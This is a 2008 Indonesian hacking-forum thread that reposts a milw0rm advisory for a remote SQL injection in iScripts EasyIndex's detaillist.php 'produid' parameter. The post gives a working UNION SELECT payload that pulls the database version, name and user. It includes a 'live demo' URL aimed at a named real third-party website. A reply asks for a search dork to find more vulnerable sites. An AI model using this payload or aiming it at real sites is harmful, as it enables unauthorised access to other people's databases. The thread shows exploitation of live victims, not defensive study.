Username Password

Lost Password
View Thread
Explore Your Brain » All About Security I.T » Info Security
iScripts EasyIndex (produid) Remote SQL Injection Discovered By SirGod
Username
Password
Register FAQ Members List Today's Posts Search

Print Thread

17-09-2008 06:45 AM iScripts EasyIndex (produid) Remote S... | Edited by EVA-00 17-09-2008 06:46 AM
User Avatar

EVA-00
HackAge


Posts: 2768
Joined: 21.05.08
Location: Wallahu a'lam
Age: 39
##############################################################
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
##############################################################
[+] Remote SQL Injection


PoC :

http://[target]/[path]/detaillist.php?produid=[SQL]


Example :

http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all
select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


Live Demo :

http://www.dawsonvalley.net/business/detaillist.php?produid=-1
union all select
1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


- Note : the number of colums can vary.


##############################################################

# milw0rm.com [2008-09-16]
Nabi Muhammad SAW bersabda :” Barangsiapa Yang Mengamalkan Ilmu Yang Ia Ketahui Maka Allah Akan Memberikan Kepadanya Ilmu Yang Belum Ia Ketahui” (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 
Offline
22-02-2009 07:21 AM RE: iScripts EasyIndex (produid) Remote S...
User Avatar

squatter7
Murid Akademi I


Posts: 10
Joined: 22.02.09
@kk ^

leh minta dork nya gag buat exploit di atas??
 
Offline
22-02-2009 08:10 PM RE: iScripts EasyIndex (produid) Remote S...
User Avatar

EVA-00
HackAge


Posts: 2768
Joined: 21.05.08
Location: Wallahu a'lam
Age: 39
PErcuma, udah di patch abis-abisan bro, ngedork jg udah gak ada sisa. Victory
Nabi Muhammad SAW bersabda :” Barangsiapa Yang Mengamalkan Ilmu Yang Ia Ketahui Maka Allah Akan Memberikan Kepadanya Ilmu Yang Belum Ia Ketahui” (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 
Offline
Jump to Forum:
Forum powered by fusionBoard
Share this Thread
URL:
BBcode:
HTML:
Similar Threads
Thread Forum Replies Last Post
SQL injection [Attack + Defense] Black & White Proof of Concept 8 10-05-2011 22:06
HTML Injection In Social Networking Site (POC For Dummies) Black & White Proof of Concept 14 17-03-2011 20:31
Remote PC Networking 14 02-01-2011 19:47
HAVECMS 2.0 Beta <======= SQL Injection Info Security 10 26-09-2010 21:52
WebSuite Content Management System (SQL Injection) Info Security 3 13-09-2010 19:06
Copyright © 2007-2016